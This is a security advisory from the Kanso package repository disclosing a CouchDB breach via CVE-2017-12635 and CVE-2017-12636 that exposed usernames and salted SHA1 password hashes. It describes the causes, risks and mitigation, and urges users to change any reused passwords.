Security alert: Kanso package repository

[caolan]

Summary

If you ever had a user account with the Kanso package repository, it is
possible that an attacker has gained access to the following details about
your account:

• Username
• A salted, non-iterated SHA1 password hash

If you reused your Kanso password elsewhere you should change your
password on other services immediately.

Detail

In Feb 2015, hosting of the Kanso repository was transferred from a self-hosted
site (kan.so) to a donated third-party mirror. This server is now being retired.

Based upon our preliminary analysis, we believe that a remote attacker created
a Kanso account via an HTTP PUT request, then used their CouchDB credentials
to exploit CVE-2017-12635 (Apache CouchDB Remote Privilege Escalation) and
CVE-2017-12636 (Remote Code Execution) in combination. These two exploits
provided the attacker with arbitrary code execution as the non-root couchdb user.
Failure to apply a critical security update is the root cause. Contributing factors
include (i) human error in credential management leading to a lack of automated
monitoring and patching for the machine in question; and (ii) diffusion of responsibility
and gaps in communication between the donor organization and the project.
Approximately 52 users are potentially affected by this breach.

The attack appears to have been untargeted and relatively unsophisticated, and
employed a well-known malware payload that consumes CPU cycles to mine for
cryptocurrency.

It doesn't appear the attacker achieved root access; however, we should assume
they had access to the CouchDB databases out of an abundance of caution.

Risks

Package integrity

We compared known-good pre-exploit backups of the package database with the
latest data and found no differences. There is no sign of tampering with packages,
documentation or the Kanso homepage.

User Data

We required minimal information during sign up, namely just a username
and password. Unfortunately, the user database pre-dated CouchDB 1.3.0
(when PBKDF2 became the default) and passwords for registrations prior to
the release of CouchDB v1.3.0 were stored as salted SHA1 hashes.

Mitigation

The machine was been retired and no futher access is possible.

If you re-used your Kanso password elsewhere you should change your
password on other services immediately. While we have no direct evidence
that password hashes were captured by any malware payload, we should
assume they were.

Help with Disclosure

As we did not require email addresses for registration, we are unable to contact
past Kanso users reliably. If you know of anyone who previously used the
Kanso package repository we would appreciate you sharing this
announcement with them.